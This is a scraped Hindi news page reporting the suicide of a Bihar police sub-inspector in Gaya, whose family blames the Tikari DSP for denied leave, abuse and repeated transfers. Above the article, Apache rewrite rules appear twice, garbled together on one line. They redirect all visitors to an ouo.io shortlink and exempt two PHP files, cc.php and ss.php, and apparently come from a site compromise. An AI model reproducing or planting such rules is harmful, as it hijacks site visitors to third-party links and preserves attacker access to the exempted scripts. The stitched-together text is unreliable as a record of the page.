
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 432
Previousगया। परैया थाने में पदस्थापित सब इंस्पेक्टर गौरीशंकर ठाकुर की खुदकुशी ने एक बार फिर से टिकारी डीएसपी के रवैए की पोल खोली है। मृत एसआई के पुत्र अभिषेक कुमार, भाई शिवशंकर ठाकुर, टिंकू कुमार के अलावा बिहार पुलिस मेन्स एसोसिएशन, गया के अध्यक्ष अनिरुद्ध यादव ने एएसआई की खुदकुशी का एकमात्र कारण टिकारी डीएसपी के रवैए को ठहराया है। एक ओर पुलिस महकमे के वरिष्ठ अधिकारी इस घटना का कारण पारिवारिक टेंशन बता रहे, तो परिवार के लोग टिकारी डीएसपी मनीष कुमार को। क्या इस बार ऐसे संवेदनशील मसले पर मगध प्रक्षेत्र डीआईजी, एसएसपी गंभीर होंगे या नहीं, यह तो आनेवाला समय ही तय कर पाएगा। परिजनों के मुताबिक लड़का देखने के बाद शादी को फाइनल करने के लिए छुट्टी मांगी जा रही थी। लेकिन आवेदन हटा दे रहे थे। शादी से संबंधी गुहार लगाई तो गाली तक दी गई। एक साल में तीन बार आंती, अलीगंज, परैया थाना ट्रांसफर किया गया। सत्यप्रकाश ठाकुर का कहना था, गौरीशंकर ठाकुर फोन पर सारी स्थिति के बारे में बताते थे। लेकिन शादी को लेकर छुट्टी नहीं मिलने और टिकारी डीएसपी के टार्चर से वे असहज हो गए। परिजनों ने घटना की निष्पक्ष जांच की मांग की है।